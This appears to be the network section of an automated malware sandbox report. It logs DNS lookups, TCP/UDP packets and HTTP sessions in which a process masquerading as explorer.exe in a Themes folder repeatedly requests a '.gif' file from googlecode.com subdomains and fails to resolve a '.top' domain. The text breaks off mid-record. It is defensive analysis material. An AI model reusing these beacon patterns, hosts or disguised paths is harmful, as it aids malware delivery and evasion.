                                                                                                                                                          Jan 13, 2025 13:19:04.638959885 CET5686780192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:04.643949986 CET805686766.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:04.644043922 CET5686780192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:04.645541906 CET5686780192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:04.650520086 CET805686766.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:05.383765936 CET805686766.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:05.383789062 CET805686766.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:05.383837938 CET5686780192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:05.383837938 CET5686780192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:05.388472080 CET5686780192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:05.388652086 CET5686780192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:05.744601965 CET5686880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:05.749633074 CET805686874.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:05.749716043 CET5686880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:05.749891996 CET5686880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:05.754726887 CET805686874.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:06.474775076 CET805686874.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:06.475022078 CET805686874.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:06.475120068 CET5686880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:06.475120068 CET5686880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:06.475120068 CET5686880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:06.475155115 CET5686880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:07.364280939 CET5686980192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:19:07.369801998 CET805686964.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:07.369887114 CET5686980192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:19:07.424693108 CET5686980192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:19:07.429563999 CET805686964.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:08.087565899 CET805686964.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:08.087589979 CET805686964.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:08.087630987 CET5686980192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:19:08.087665081 CET5686980192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:19:08.108334064 CET5686980192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:19:08.108717918 CET5686980192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:19:08.422746897 CET5687080192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:08.427664995 CET805687066.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:08.427752018 CET5687080192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:08.430860043 CET5687080192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:08.435655117 CET805687066.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:09.142765045 CET805687066.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:09.142785072 CET805687066.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:09.142982006 CET5687080192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:09.148560047 CET5687080192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:09.148611069 CET5687080192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:19:09.466305017 CET5687180192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:09.570687056 CET805687174.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:09.570880890 CET5687180192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:09.582691908 CET5687180192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:09.587475061 CET805687174.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:10.295950890 CET805687174.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:10.295970917 CET805687174.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:10.296020985 CET5687180192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:10.296053886 CET5687180192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:10.298444033 CET5687180192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:19:10.298470974 CET5687180192.168.2.474.125.133.82

                                                                                                                                                          UDP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Jan 13, 2025 13:17:10.261105061 CET6298453192.168.2.41.1.1.1
                                                                                                                                                          Jan 13, 2025 13:17:10.268588066 CET53629841.1.1.1192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:12.445127964 CET5651653192.168.2.41.1.1.1
                                                                                                                                                          Jan 13, 2025 13:17:12.453325987 CET53565161.1.1.1192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:14.555270910 CET5049353192.168.2.41.1.1.1
                                                                                                                                                          Jan 13, 2025 13:17:14.604494095 CET53504931.1.1.1192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:33.929214954 CET53563761.1.1.1192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:45.144247055 CET53637741.1.1.1192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:02.199925900 CET53554931.1.1.1192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:09.671674967 CET53599451.1.1.1192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:14.723872900 CET53640931.1.1.1192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:35.733280897 CET53643531.1.1.1192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:43.484617949 CET53527271.1.1.1192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:53.295874119 CET53593651.1.1.1192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:02.132957935 CET53543481.1.1.1192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:19:08.960175037 CET53556041.1.1.1192.168.2.4

                                                                                                                                                          DNS Queries

                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                          Jan 13, 2025 13:17:10.261105061 CET192.168.2.41.1.1.10xb992Standard query (0)codecmd01.googlecode.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jan 13, 2025 13:17:12.445127964 CET192.168.2.41.1.1.10xc591Standard query (0)codecmd02.googlecode.comA (IP address)IN (0x0001)false
                                                                                                                                                          Jan 13, 2025 13:17:14.555270910 CET192.168.2.41.1.1.10x7976Standard query (0)codecmd03.googlecode.comA (IP address)IN (0x0001)false

                                                                                                                                                          DNS Answers

                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                          Jan 13, 2025 13:17:10.268588066 CET1.1.1.1192.168.2.40xb992No error (0)codecmd01.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jan 13, 2025 13:17:10.268588066 CET1.1.1.1192.168.2.40xb992No error (0)googlecode.l.googleusercontent.com66.102.1.82A (IP address)IN (0x0001)false
                                                                                                                                                          Jan 13, 2025 13:17:12.453325987 CET1.1.1.1192.168.2.40xc591No error (0)codecmd02.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jan 13, 2025 13:17:12.453325987 CET1.1.1.1192.168.2.40xc591No error (0)googlecode.l.googleusercontent.com74.125.133.82A (IP address)IN (0x0001)false
                                                                                                                                                          Jan 13, 2025 13:17:14.604494095 CET1.1.1.1192.168.2.40x7976No error (0)codecmd03.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jan 13, 2025 13:17:14.604494095 CET1.1.1.1192.168.2.40x7976No error (0)googlecode.l.googleusercontent.com64.233.167.82A (IP address)IN (0x0001)false
                                                                                                                                                          Jan 13, 2025 13:17:33.929214954 CET1.1.1.1192.168.2.40x9166Server failure (2)373292cm.nyashka.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Jan 13, 2025 13:17:45.144247055 CET1.1.1.1192.168.2.40x5fbeServer failure (2)373292cm.nyashka.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Jan 13, 2025 13:18:02.199925900 CET1.1.1.1192.168.2.40xe7b9Server failure (2)373292cm.nyashka.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Jan 13, 2025 13:18:09.671674967 CET1.1.1.1192.168.2.40xabc7Server failure (2)373292cm.nyashka.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Jan 13, 2025 13:18:15.478084087 CET1.1.1.1192.168.2.40x1Server failure (2)373292cm.nyashka.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Jan 13, 2025 13:18:35.733280897 CET1.1.1.1192.168.2.40x6420Server failure (2)373292cm.nyashka.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Jan 13, 2025 13:18:43.484617949 CET1.1.1.1192.168.2.40xb554Server failure (2)373292cm.nyashka.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Jan 13, 2025 13:18:53.295874119 CET1.1.1.1192.168.2.40x3418Server failure (2)373292cm.nyashka.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Jan 13, 2025 13:19:02.132957935 CET1.1.1.1192.168.2.40x2b1aServer failure (2)373292cm.nyashka.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Jan 13, 2025 13:19:08.960175037 CET1.1.1.1192.168.2.40x3926Server failure (2)373292cm.nyashka.topnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                          • codecmd01.googlecode.com
                                                                                                                                                          • codecmd02.googlecode.com
                                                                                                                                                          • codecmd03.googlecode.com

                                                                                                                                                          HTTP Packets

                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          0192.168.2.44973066.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:10.278882027 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:11.031574011 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:10 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:11.031611919 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1192.168.2.44973174.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:12.459279060 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:13.192857981 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:13 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:13.192903996 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          2192.168.2.44973264.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:14.612087965 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:15.318314075 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:15 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:15.318335056 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          3192.168.2.44973366.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:16.547116995 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:17.276469946 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:17 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:17.276489973 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          4192.168.2.44973474.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:18.631751060 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:20.022891045 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:19 GMT
